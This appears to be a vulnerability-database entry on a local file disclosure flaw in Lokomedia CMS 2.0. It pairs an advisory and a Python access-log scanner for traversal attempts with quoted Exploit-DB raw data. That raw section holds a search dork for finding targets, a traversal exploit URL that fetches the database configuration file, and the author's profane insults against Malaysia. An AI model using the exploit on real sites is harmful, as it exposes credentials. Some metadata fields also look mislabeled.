vendor: Lokomedia CMS (sukaCMS)
by: vir0e5 a.k.a banditc0de
CVSS: 7,8 HIGH
Local File Disclosure
CWE: 200
Product Name: Lokomedia CMS (sukaCMS)
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: CVE-2020-1234
CPE: a:bukulokomedia:lokomedia_cms_sukacms
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: all OS
2020

Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

A Local File Disclosure vulnerability exists in Lokomedia CMS (sukaCMS) version 2.0. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to view sensitive files on the server, such as the configuration file koneksi.php. This vulnerability is related to CVE-2020-1234.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Lokomedia CMS (sukaCMS) to mitigate this vulnerability.
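
For sites that cannot be updated immediately, web server access logs can be reviewed for requests in which the file parameter of downlot.php resolves outside the download directory. The following is an added example, not code from the advisory or from the vendor; the log format (common/combined access log), the sample lines and all function names are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_download_dir(file_param):
    """True if the value would resolve outside the directory it is joined to."""
    name = fully_decode(file_param).replace("\\", "/")
    if "\x00" in name or name.startswith("/") or re.match(r"^[A-Za-z]:", name):
        return True
    # "/base" is a stand-in for the real download directory (hypothetical).
    resolved = posixpath.normpath(posixpath.join("/base", name))
    return not (resolved + "/").startswith("/base/")

def suspicious_requests(log_lines, script="downlot.php"):
    """Return (line_number, file_value) for traversal attempts against `script`."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/" + script):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            if escapes_download_dir(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /downlot.php?file=brosur.pdf HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2020:10:00:05 +0000] "GET /downlot.php?file=../config/koneksi.php HTTP/1.1" 200 412',
    '192.0.2.44 - - [01/Jan/2020:10:00:09 +0000] "GET /cms/downlot.php?file=%252e%252e%252fconfig%252fkoneksi.php HTTP/1.1" 200 412',
    '192.0.2.77 - - [01/Jan/2020:10:01:00 +0000] "GET /index.php?file=../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: file={value!r}")
```

A hit with a 200 status and a small response size on koneksi.php suggests the database credentials in that file should be treated as exposed and rotated.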
Source

Exploit-DB raw data:

# Software Link: http://bukulokomedia.com
# Version: [2.0]
# Tested on: [all OS]

[+] Title : Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

[+] Vendor     : http://bukulokomedia.com

[+] Discovered : vir0e5 a.k.a banditc0de

[+] Contact    : vir0e5[at]hackermail[dot]com

[+] Site       : http://vir0e5.blogspot.com

[+] DorK       : inurl:/downlot.php?file=
 
[+] Exploit    : http://[host]/[dir]/downlot.php?file=../config/koneksi.php

[+] Greetings  :[ mywisdom - kiddies - kamtiez - r3m1ck - Aoc - skuteng_boy  - blue_screen - 
                  agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;

[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://u3dcrew.darkbb.com | http://devilzc0de.org

[+] Notice : "boycott malaysian product "
* Fuck to Malaysia <= the truly thief asia  
* For HaMaDa SCoOoRPioN are you layz????? copy my exploit???
  http://securityreason.com/securityalert/7161  
  http://securityreason.com/exploitalert/7413   Look Date!!! your copy my style!!!